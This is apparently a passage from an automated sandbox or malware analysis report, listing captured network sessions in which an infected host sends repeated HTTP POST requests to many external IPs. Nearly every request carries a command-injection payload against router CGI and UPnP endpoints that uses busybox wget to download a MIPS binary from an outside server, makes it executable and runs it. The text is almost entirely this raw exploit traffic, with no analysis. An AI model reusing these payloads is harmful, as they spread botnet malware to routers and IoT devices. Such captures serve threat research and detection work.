                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              676192.168.2.145344694.120.39.1788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.553812027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              677192.168.2.144396094.122.200.168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.703974009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              678192.168.2.144795685.192.56.2258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.728763103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.841109037 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.984858036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              679192.168.2.143993685.72.169.938080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.734170914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.994363070 CET430INHTTP/1.1 404 Not Found
                                              Date: Wed, 22 Nov 2023 16:34:31 GMT
                                              Server: DNVRS-Webs
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              680192.168.2.145457431.136.203.528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.963479996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.537216902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.657162905 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.121107101 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.728900909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              681192.168.2.145423294.121.79.1968080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.600326061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              682192.168.2.145866294.121.98.2508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.607896090 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              683192.168.2.145522695.181.135.108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.623008013 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              684192.168.2.145137894.122.83.1648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.624908924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              685192.168.2.143635494.26.249.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.794675112 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              686192.168.2.144735895.68.244.338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.839416027 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              687192.168.2.144206894.110.218.1238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:10.195847034 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              688192.168.2.145338831.136.0.1288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:10.394439936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.977152109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.161187887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.656994104 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:19.520796061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              689192.168.2.144624894.121.79.1018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:10.417061090 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              690192.168.2.144020685.239.227.1668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:10.424118996 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
